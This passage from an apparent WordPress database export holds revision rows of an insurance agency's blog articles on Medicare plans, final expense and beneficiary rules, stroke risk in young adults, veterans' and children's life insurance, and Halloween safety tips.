Advantage</strong>\r\nThe coverage period for Medicare Advantage plans is one year. They have limited guarantees when it comes to coverage. They can change every year, drop your coverage, or change the providers in your network.\r\n\r\nThe federal government requires that plan sponsors send an Annual Notice of Change, or ANOC, to participants. An ANOC is sent to you each fall and “includes any changes in coverage, costs, or service area that will be effective in January.”<sup>2</sup>\r\n<h3>2. Coverage</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare covers medical services and supplies in hospitals, doctors’ offices, and other healthcare settings. Services are either covered under Part A or Part B.\r\n\r\nMedicare Supplement insurance can help pay some of your out-of-pocket costs not covered by Medicare, like deductibles, coinsurance, copayments, etc.\r\n\r\n<strong>Medicare Advantage</strong>\r\nMedicare Advantage Plans cover Medicare Part A, Part B, and usually Part D. They are offered by private companies approved by Medicare. Medicare Supplement policies provide supplemental coverage for services that Original Medicare approves.\r\n<h3>3. Doctor and Hospital Choice</h3>\r\n<strong>Original Medicare</strong>\r\nOriginal Medicare allows you to choose from any doctor in the United States that accepts Medicare.\r\n\r\nUnder Medicare Supplement insurance, you can go to a doctor or hospital that accepts Original Medicare. If a doctor accepts Medicare, they generally accept Medicare Supplement insurance.\r\n\r\n<strong>Medicare Advantage</strong>\r\nWith Medicare Advantage, you can choose from a network of doctors that the provider has preapproved.\r\n\r\nIf you are considering Medicare Advantage and want to stay with your doctor or hospital, ensure the doctor or hospital is in the plan\'s network.\r\n<h3>Conclusion</h3>\r\nConsider your needs and priorities for Medicare coverage as you near age 65.\r\n\r\nResearch whether Original Medicare—by itself or paired with Medicare Supplement insurance—or Medicare Advantage will better suit your needs.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<span style=\"font-size: 8pt;\"><em>Sources:</em>\r\n1. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Understanding Medicare Advantage Plans, 2020</span>\r\n<span style=\"font-size: 8pt;\">2. <a href=\"https://www.medicare.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">Medicare.gov</a>, Plan Annual Notice of Change (ANOC), 2020</span>','How Do You Choose The Best Medicare Coverage?','','inherit','closed','closed','','246-revision-v1','','','2023-03-19 17:43:54','2023-03-19 17:43:54','',246,'http://cmdev-site1.com/?p=400',0,'revision','',0),(401,3,'2023-03-19 17:44:19','2023-03-19 17:44:19','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nNo matter your age, there is one expense we all have to plan for—our funeral. While it may not seem like the most uplifting topic to speak about, having a plan for your final expenses can help provide financial assistance to those responsible for making your funeral arrangements.\r\n\r\nIf you’re looking for a solution to cover costs, it may be time to consider final expense insurance.\r\n<h3>What is Final Expense Insurance?</h3>\r\nFinal expense insurance, also known as burial insurance or funeral insurance, is a type of life insurance policy designed to help pay for funeral services and merchandise costs upon the death of the insured.<sup>1</sup>\r\n\r\nIn other words, final expense insurance policies are designed to help pay for funeral related expenses such as body preparation, caskets, urns, and other related expenses.\r\n\r\nWith the average funeral cost ranging from $7,000 to $9,000 as of 2020,<sup>2</sup> having a policy in place to help cover costs may help alleviate the financial burden death can place on a grieving family.\r\n<h3>Who Should Consider Final Expense Insurance?</h3>\r\nDespite final expense insurance typically being marketed towards seniors, final expense insurance can be purchased by adults at any age. In fact, final expense insurance is often presented as “easy to get,” with some providers of final expense insurance not even asking for a completed medical exam to qualify.<sup>3</sup>\r\n\r\nFor those with complicated medical histories, seniors with limited to no beneficiaries, those with few to no financial responsibilities (e.g., mortgage, car payments, loans, etc.), or for those just looking to cover their funeral costs—final expense insurance may be well worth exploring.\r\n\r\nDue to the array of final expense insurance providers and products available, it’s essential you do your research before committing to any single policy. For any questions, we suggest contacting your local insurance agent or financial advisor.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n1. Investopedia, Burial Insurance, 2018, <a href=\"https://www.investopedia.com/terms/b/burial-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/terms/b/burial-insurance.asp</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">2. World Population Review, Average Funeral Costs By State 2020, 2020, <a href=\"https://worldpopulationreview.com/states/average-funeral-cost-by-state/\" target=\"_blank\" rel=\"noopener noreferrer\">https://worldpopulationreview.com/states/average-funeral-cost-by-state/</a></span></em>\r\n<em><span style=\"font-size: 8pt;\">3. Investopedia, Burial Insurance vs. Life Insurance: What’s the Difference? 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/111314/burial-insurance-vs-life-insurance.asp</a></span></em>','What Is Final Expense Insurance And Who Should Buy It?','','inherit','closed','closed','','249-revision-v1','','','2023-03-19 17:44:19','2023-03-19 17:44:19','',249,'http://cmdev-site1.com/?p=401',0,'revision','',0),(403,3,'2023-03-19 17:45:42','2023-03-19 17:45:42','<h2><span style=\"color: #ffffff;\">-</span></h2>\r\n<h2><strong>What is a beneficiary for a life insurance policy?</strong></h2>\r\nA beneficiary is a person or organization designated to receive a death benefit payout from the insurer once the insured passes away.\r\n\r\nOften, beneficiaries are loved ones listed by the insured on their life insurance policy before they pass away. However, beneficiaries can be trusted non-relatives, friends, business partners, and even charitable organizations.\r\n\r\n&nbsp;\r\n<h2><strong>How do beneficiaries get a death benefit?</strong></h2>\r\nIf you’ve been listed as a beneficiary on a life insurance policy, you will likely get a death benefit payout from your loved one’s life insurance policy. In life insurance policies, death benefits vary in amount, and depend on the type of life insurance policy.\r\n\r\nSome life insurance policies only pay a death benefit under certain conditions. However, before any death benefit is paid out, the beneficiary will have to file a claim on the life insurance policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<blockquote><span style=\"font-size: 18pt;\">Being a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help where needed.</span></blockquote>\r\n<h2><strong><span style=\"color: #ffffff;\">-</span>\r\nHow do beneficiaries file a life insurance claim?</strong></h2>\r\n<span style=\"color: #ffffff;\">-</span>\r\nTo claim the death benefit, life insurance beneficiaries must submit a claim to the appropriate insurance company. Since insurance companies won’t generally reach out to you, it’s important you contact the appropriate insurance company and file your claim as soon as possible.\r\n\r\nOnce you know the name of the insurance company and have contacted them, you will be asked to submit certain documents to start the claim filing process.\r\n\r\nThe best way to determine what documents are needed is to contact the customer service department for the insurance company the policy was purchased. Generally speaking, life insurance companies require those filing a claim to provide the following:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Death certificate:</strong></h3>\r\n</li>\r\n</ul>\r\nThe insurance company will need a certified copy of the insured’s death certificate. This proof of death ensures the policy is being claimed legitimately and helps prevent fraud. To receive a certified copy of the death certificate, you’ll need to contact the funeral home or the medical professional who confirmed the time and place of death.\r\n\r\nHowever, you can also request a copy from the local vital records office. Keep in mind it can take a bit of time to receive a copy, so stay on top of this.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Claim form:</strong></h3>\r\n</li>\r\n</ul>\r\nAlso known as a “request for benefits,” this form asks for information such as cause of death, insured’s name, and policy number. You may also need to indicate your relationship to the policyholder and how you would like to receive the death benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<ul>\r\n 	<li>\r\n<h3><strong>Policy document:</strong></h3>\r\n</li>\r\n</ul>\r\nEverything from pertinent policy information to relevant information on the insured will be in this document. If you’re having trouble locating the policy, you can try contacting the insurance company directly, contacting the life insurance agent associated with the policy, or reaching out to the policyholder’s financial advisor for further insight.\r\n\r\nDepending on the policy the deceased had, you may find the insurance company requires additional documents. Make sure to provide additional documents as necessary and at the discretion of the insurance company.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>You gathered your documents, now what?</strong></h2>\r\nOnce you’ve gathered the necessary documents to file a claim, it’s time you submit the documents. Be sure to make copies of the documents for your own records – this helps you quickly reference them when the insurance company reaches out. Once the claim is filed, you will have to wait for the claim to be processed.\r\n\r\nIn other words, the insurance company will review the information provided and make a determination on the claim.\r\n\r\nKeep in mind some insurance policies do not pay out a death benefit if the insured dies under certain circumstances, so it is possible to get a request for more information or even to have a claim rejected.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>Choose how you want to receive the death benefit.</strong></h2>\r\nIf your claim has been approved, there are a few different ways you may be able to receive the death benefit. This can depend on the insurance company. Two options in which a death benefit can be received are lump-sum or annuities.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Lump-sum:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose a lump-sum payment will receive the entire death benefit at once.\r\n<ul>\r\n 	<li>\r\n<h3><strong>Annuity:</strong></h3>\r\n</li>\r\n</ul>\r\nBeneficiaries who choose an annuity will receive a predetermined annual payment for a predetermined number of years in accordance with the annuitization date.\r\n\r\nBeing a beneficiary is a big deal, but it doesn’t have to feel like one. As a beneficiary, always make sure you’re aware of any changes to the life insurance policy and remember that the life insurance customer service department is there to help when needed.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','What To Expect As A Beneficiary On A Life Insurance Policy','','inherit','closed','closed','','256-revision-v1','','','2023-03-19 17:45:42','2023-03-19 17:45:42','',256,'http://cmdev-site1.com/?p=403',0,'revision','',0),(404,3,'2023-03-19 17:46:22','2023-03-19 17:46:22','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3><strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3><strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3><strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3><strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary.\r\n\r\nIn fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-19 17:46:22','2023-03-19 17:46:22','',278,'http://cmdev-site1.com/?p=404',0,'revision','',0),(405,3,'2023-03-19 17:46:50','2023-03-19 17:46:50','<span style=\"font-size: 8pt;\">By Stacy Williams</span>\r\n\r\nWhen we think of our youth, we think of all the dangerous stunts we accomplished during it—somersaults, handstands, backflips, and a few stories you don’t ever plan on telling your mother.\r\n\r\nHowever, despite the appearance of invincibility our youth provides, there is a silent threat growing in number—strokes.\r\n<h3>Are Young People Really at Risk of Having a Stroke?</h3>\r\nThe short answer is yes. Even though the overall rate of stroke is decreasing, strokes are on the rise in young and middle aged people, with “most experts considering a young stroke age to be under 45.”<sup>1</sup>\r\n\r\nWhile for most young people, the thought of having a stroke seems like an impossibility, an estimated 10% of all strokes occur in people under age 45.<sup>2</sup>\r\n\r\nAs for what causes strokes in young people, Dr. Buletko, MD at the Cleveland Clinic, states, “Illicit drug use and genetic conditions certainly account for some of the strokes we see in younger populations. Beyond that, the causes of stroke in younger adults mirror the causes in adults.”<sup>3</sup>\r\n\r\nAccording to Sanford Health Care, smoking also plays a role in strokes in young people, with high blood pressure, diabetes, and rare genetic conditions also playing a role in the risk of stroke for young people.<sup>2</sup>\r\n<h3>How Are Strokes in Young People Different?</h3>\r\nIt’s only natural to assume strokes in young people differ from strokes in older people. In fact, “Compared with strokes in older people, [a] stroke in the young is a different beast,” says S. Ausim Azizi, MD, Ph.D., a professor and the chair of neurology at Temple University Medical School in Philadelphia.<sup>1</sup>\r\n\r\nOne reason for this is due to the fact that strokes in young people can mean a “lifetime of recovery” and “loss of many productive years.”<sup>1</sup> With 15 to 30 percent of people who have had a stroke facing some sort of long-term disability, having a stroke while young can be absolutely devastating.<sup>1</sup>\r\n\r\nAnother way strokes in young people may differ is their cause. While 80 to 85 percent of all strokes at any age are caused by a clot blocking blood flow to the brain, strokes in young people can result from illicit drug use and smoking—something not nearly as common with strokes in older people.<sup>3</sup>\r\n\r\nHowever, despite some differences in severity and cause, most strokes have the same risk factors, which is why it’s paramount that young people maintain a healthy lifestyle. Some common causes for stroke (at any age) are as follows:<sup>3</sup>\r\n\r\nHigh blood pressure\r\nHigh cholesterol\r\nDiabetes\r\nSmoking\r\nObesity\r\nAbnormal heart structures\r\n<h3>Treating Strokes in Young People</h3>\r\nWhile the first line of treatment in a stroke for young people is the same as seen in older populations, stokes in young people can sometimes be harder to identify—making it more difficult for young people to seek treatment after a stroke.\r\n\r\nDr. Buletko states that a severe onset of a headache may be the first warning sign of a hemorrhagic stroke for young people, with pain characterized as “the worst headache of your life” or a “thunderclap feeling in your head” as a sign of possibly needing immediate medical attention.<sup>1</sup>\r\n\r\nOther symptoms can include vision loss, double vision, slurred speech, dizziness, or difficulty walking<sup>2</sup>—something many young people write off without there being more common stroke symptoms, such as a facial droop and weakness on one side of the body.<sup>2</sup>\r\n\r\nAll in all, strokes in young people are difficult to identify due to a lack of recognition that a stroke can happen to someone at any age. With the exception of a few additional factors causing strokes in young people, strokes in young people look the same as strokes in older populations.\r\n\r\nMaintaining a healthy lifestyle is key to possibly preventing a stroke, but there is. Unfortunately, no way to guarantee a stroke won’t happen to you. For this reason, it is recommended you familiarize yourself with stroke warning signs, which can simply be remembered by the acronym BE FAST.\r\n<h3>BE FAST stands for:</h3>\r\nBalance: A sudden loss of balance and coordination\r\nEyes: Sudden vision loss in one or both eyes and/or double vision\r\nFace: Any drooping on one side of the face\r\nArms: Sudden weakness in one arm or leg\r\nSpeech: Slurring, difficulty speaking, or difficulty understanding words\r\nTime: Quickly call 911 if you or someone you know is experiencing any of these symptoms<sup>3</sup>\r\n\r\nNo matter your age, BE FAST could save your life, so make sure to keep this acronym fresh in your memory!\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Everyday Health, Think You’re Too Young for a Stroke? Think Again, 2017, <a href=\"https://www.everydayhealth.com/news/think-youre-too-young-stroke/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.everydayhealth.com/news/think-youre-too-young-stroke/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Stanford Health Care, Stroke in Young People, 2020, <a href=\"https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://stanfordhealthcare.org/medical-conditions/brain-and-nerves/stroke/stroke-in-young-people.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Cleveland Clinic, Why Are Strokes on the Rise in Younger People?, 2019, <a href=\"https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/\" target=\"_blank\" rel=\"noopener noreferrer\">https://health.clevelandclinic.org/why-are-strokes-on-the-rise-in-younger-people/</a></span></em>','The Risk Of Having A Stroke For People Under 40','','inherit','closed','closed','','295-revision-v1','','','2023-03-19 17:46:50','2023-03-19 17:46:50','',295,'http://cmdev-site1.com/?p=405',0,'revision','',0),(406,3,'2023-03-19 17:47:16','2023-03-19 17:47:16','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nVeterans put their lives on the line, fighting to protect our way of life and rights as everyday Americans. For this reason and more, it’s paramount we serve our veterans as well as they served us, and one way to do this is through providing life insurance.\r\n\r\nLife insurance plays a pivotal role in providing financial protection for families all around the globe. For veterans, life insurance can make all the difference by providing their families with long-term financial security given the “extraordinary risks involved in military service.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Life Insurance Options for Veterans</h3>\r\nLife insurance is a valuable asset for many Americans, especially for veterans. So, when it comes to selecting a life insurance option, it’s important veterans be informed of their options. For veterans, there are two main options for securing life insurance. Veterans can either purchase life insurance from the public, government funded sector or in the private sector.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Servicemembers’ Group Life Insurance (SGLI)</h4>\r\nSGLI is a public life insurance option given to all military service personnel after enrolling in the military. SGLI offers military personal maximum coverage up to $400,000 and includes traumatic injury protection.<sup>2</sup> However, SGLI only lasts for 120 days after service has ended, meaning that military personnel will have to find another form of life insurance coverage in the public or private sector after SGLI has expired.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Servicemembers’ Group Disability Extension Life Insurance (SGLI - DE)</h4>\r\nUnlike other life insurance options, SGLI - DE is an extension of SGLI offered only to servicemembers rendered “totally disabled at the time of discharge.”<sup>2</sup> Those who qualify for SGLI - E may apply to keep their SGLI coverage for an additional two years after their initial service separation date.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Service - Disabled Veterans Insurance (S -DVI)</h4>\r\nS - DVI is a life insurance program provided to eligible military veterans who have received a “service-connected disability rating” from the VA.<sup>2</sup> S - DVI provides veterans with $10,000 in life insurance coverage, and veterans who qualify may also be able to apply for a premium waiver.<sup>2</sup> For veterans who qualify, they may be able to receive an additional $30,000 in life insurance coverage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Veterans Group Life Insurance (VGLI)</h4>\r\nThe most common life insurance option for veterans is the VGLI, which is designed to help former servicemembers convert from SGLI to a “civilian program of lifetime renewable term coverage after separation from service.”<sup>1</sup> One of the main benefits of VGLI includes allowing veterans to receive up to 50% of their life insurance proceeds early if they have a life expectancy of nine months or less.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h3>Private Sector</h3>\r\nIf public life insurance isn’t fit for your situation as a US veteran or family member of a US veteran, there are other life insurance options available—namely in the private sector.\r\n\r\nThere are a number of ways to convert from the public, military provided life insurance to private life insurance, but one of the most common methods involves switching from SGLI to private health insurance immediately after SGLI expires (120 days after service has ended).<sup>2</sup>\r\n\r\nTo prevent any gaps in coverage, it’s vital that those looking to transition to private life insurance start any applications needed as soon as possible.\r\n\r\nAnother option veterans have is to transition from SGLI to VGLI, allowing veterans and their families time to explore, consider, and settle on a private life insurance policy without risking gaps in coverage.<sup>2</sup>\r\n\r\nHowever, like public life insurance, private life insurance comes in a number of different shapes and sizes. For this reason, it is recommended that veterans considering a private life insurance policy explore the different types of private life insurance options available, like term and whole life insurance.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Term Life Insurance</h4>\r\nTerm life insurance provides the insured with a predetermined death benefit and covers the insured for a set number of years.<sup>3</sup> The number of years in which the insured is under the policy is called a “term.”\r\n\r\nAfter the term of the policy, the insured will have to decide whether to renew their term life policy for another term. Annual premiums are typically offered at a fixed rate, and the death benefit only pays out if the insured dies during the designated term period.\r\n\r\nTerm life insurance is often the least expensive of life insurance available.<sup>3\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Permanent Life Insurance</h4>\r\nPermanent life insurance provides the insured with a death benefit as well as a cash value component.<sup>3</sup> In other words, the premiums the insured pays go towards the policy while acquiring cash value, which the insured can then access to help supplement their income or make payments while they’re still alive.<sup>3</sup>\r\n\r\nPermanent life insurance is designed to cover the insured for as long as they are alive, meaning that the insured doesn’t have to worry about their policy expiring at the end of a term or needing to renew.\r\n\r\nIn closing, there are a number of different options veterans can pursue when considering a life insurance policy.\r\n\r\nHowever, what they ultimately decide should be based on what’s best for them and their own financial well-being. We suggest consulting a financial advisor to help advise you during your decision making process.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. U.S. Department of Veterans Affairs, Life Insurance, 2019, <a href=\"https://www.benefits.va.gov/insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.benefits.va.gov/insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Life Insurance for Veterans, 2019, <a href=\"https://www.policygenius.com/life-insurance/life-insurance-for-veterans/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.policygenius.com/life-insurance/life-insurance-for-veterans/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Investopedia, The Best Type of Life Insurance For You Right Now, 2019, <a href=\"https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx</a></span></em>','Beyond Active Duty: Life Insurance Options For US Veterans','','inherit','closed','closed','','306-revision-v1','','','2023-03-19 17:47:16','2023-03-19 17:47:16','',306,'http://cmdev-site1.com/?p=406',0,'revision','',0),(407,3,'2023-03-19 17:47:44','2023-03-19 17:47:44','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nA lot of parents wonder if purchasing life insurance for their children is the right financial decision. However, with valid concerns for both sides of the argument, it can be hard to determine if purchasing life insurance for your child is the right decision.\r\n\r\nThis blog will cover everything you need to know about life insurance on children while presenting you the pros and cons of such an investment with insight from an array of experts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>How Life Insurance on Children Works</h3>\r\nLife insurance on children is often marketed to parents and grandparents as a way to save for the child’s financial future while protecting the child’s insurability. While there are an array of child life insurance options available, most child life insurance policies are offered in the form of whole life, a type of permanent life insurance that includes a cash value component.<sup>1</sup>\r\n\r\nWhole life insurance policies that include a cash value component can be used to pay for a variety of things, including but not limited to college education, a car or housing down payment, medical bills, and more.\r\n\r\nSome argue that one of the most compelling features of child life insurance comes in the form of its cash value component, which is tax-deferred—meaning that it isn’t taxed as income until you withdraw money from the policy or surrender the policy entirely.<sup>1</sup>\r\n\r\nThat, and the slow but steady growth of cash value over time, can make child life insurance an alluring option for parents and grandparents looking to ensure the child protected is in the best possible financial position for the future.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The Pros and Cons</h3>\r\nAs mentioned, there are great points to consider for buying or not buying a life insurance policy for your child. But with so many conflicting opinions on the matter, it can be difficult to navigate.\r\n\r\nBelow, you’ll find a list of commonly associated pros and cons of child life insurance to help you make the best decision for your family.\r\n<ul>\r\n 	<li><strong>Pro:</strong> There are a number of factors that can impact your child’s future insurability, including high blood pressure, diabetes, and obesity, to name a few.<sup>2</sup> With this in mind, a child who develops any health issue early on in life may have trouble qualifying for life insurance coverage in the future, as they could be considered a higher risk.<sup>2</sup> By purchasing child life insurance coverage early, you can help ensure your child has coverage now and well into their adult life—regardless of any medical issues that may develop along the way.</li>\r\n 	<li><strong>Con:</strong> The chances of a child developing a health issue so early on in life are rare. So, investing in a child life insurance policy can be an expensive investment for such a minute risk.</li>\r\n 	<li><strong>Pro:</strong> Small policies can be affordable, with costs ranging from $5 to $15 a month.<sup>2</sup> While the death of a child is rare, being covered in the case of tragedy can help provide you with financial security in the worst possible situation imaginable.</li>\r\n 	<li><strong>Con:</strong> Statistically, the odds of a child dying are very slim. Some experts suggest stashing money into an emergency fund instead of investing in a child life policy, which would allow for the funds to be used in case of any crisis—not just the death of a child.<sup>1</sup></li>\r\n 	<li><strong>Pro:</strong> You can use the cash value your policy accrues to help your child pay for an array of costs, including college expenses, a car payment, or something else down the line.<sup>2</sup></li>\r\n 	<li><strong>Con:</strong> Some argue that there are better ways to save for your child’s financial future than with a child\'s life insurance policy. In fact, Carrie Houchins-Witt, a financial advisor in Iowa, states, “There are a multitude of opportunities to make a better return than through investing in life insurance.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\n<h3>To Summarize</h3>\r\nAs you can see, there are a number of arguments for and against child life insurance. However, expert opinions and blog postings aside, you know what path provides the best opportunity for you and your family.\r\n\r\nMake sure to take your unique situation into account and consult with your local insurance agent or financial advisor before proceeding with a child life insurance policy purchase.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet, Life Insurance for Children: The Cases for and Against, 2018, <a href=\"https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. The Balance, Top 5 Reasons to Buy Life Insurance for Your Children, 2019, <a href=\"https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226</a></span></em>','Life Insurance On Children: What You Need To Know','','inherit','closed','closed','','311-revision-v1','','','2023-03-19 17:47:44','2023-03-19 17:47:44','',311,'http://cmdev-site1.com/?p=407',0,'revision','',0),(408,3,'2023-03-19 17:48:14','2023-03-19 17:48:14','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nHalloween is a time for costumes, treats, and make-believe scares. In preparation for the fun, however, very real safety concerns should be addressed. One of the biggest concerns during Halloween is pedestrian safety.\r\n\r\nTrick-or-treating is a lot of fun, but there are some frightening statistics when safety measures aren’t taken. According to the National Safety Council:\r\n<blockquote><em>Children are more than twice as likely to be hit by a car and killed on Halloween than on any other day of the year, and October ranks No. 2 in motor vehicle deaths by month.</em></blockquote>\r\nTo help your loved ones stay safe during the spooky season, we’ve compiled some helpful “tricks” below:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Trick-Or-Treat Tips</h4>\r\n<ol>\r\n 	<li>Younger kids (under age 12) should have a dependable adult with them.</li>\r\n 	<li>Only trick-or-treat in well-lit, well-known areas (like your street and/or neighborhood).</li>\r\n 	<li>NEVER enter a stranger’s home or car.</li>\r\n 	<li>Do not cross into the street except at designated crosswalks, and NEVER run.</li>\r\n 	<li>Put away electronic devices (adults and kids) and keep heads up.</li>\r\n 	<li>Drivers: pay special attention for children walking and especially those in darker clothing.</li>\r\n 	<li>A grown-up should inspect all treats before consumption for loose or torn wrappers, choking hazards, etc. When in doubt, throw it out!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Ghoulish Gear</h4>\r\n<ol>\r\n 	<li>Make sure costumes 